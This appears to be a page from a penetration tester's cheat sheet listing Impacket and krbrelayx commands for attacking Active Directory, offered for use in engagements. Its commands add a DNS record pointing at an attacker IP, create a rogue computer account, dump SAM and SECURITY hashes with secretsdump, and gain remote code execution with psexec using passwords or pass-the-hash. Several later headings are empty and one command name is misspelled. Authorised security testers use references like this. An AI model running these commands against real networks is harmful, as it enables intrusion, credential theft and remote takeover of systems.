search

Impacket

Collection of useful impacket commands common in engagements.

Add DNS record

# Git clone following repo: https://github.com/dirkjanm/krbrelayx/tree/master
python3 dnstool.py -u <domain\username> -p <password> -a add -r <ns-record> -d <attacker-ip> <dc-ip>

# Check if NS record has been added
python3 dnstool.py -u <domain\username> -p <password> -a query -r <ns-record> -d <attacker-ip> <dc-ip>

Add computer account

impacket-addcomputer -dc-ip <DC-IP> -computer-name <COMPUTER-NAME>$ -computer-pass '<PASSWORD>' '<DOMAIN-FQDN>/<USERNAME>:<PASSWORD>'

Dump local hashes with secretsdump

# Dump SAM
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Dump SECURITY
impacket-secretsdump -security SECURITY -system SYSTEM LOCAL

RCE with psexec

# With a password
impacket-psxec <domain>/<username>:'<password>'@<target>

# With a hash
impacket-psexec <domain>/<username>@<target> -hashes <ntlm>:<ntlm>

SMBclient

MSSQLclient

Get a list of all AD users

Dump SAM and SYSTEM using registry

Enumerate Group Policy passwords

PreviousResponderNextKerberoasting

Last updated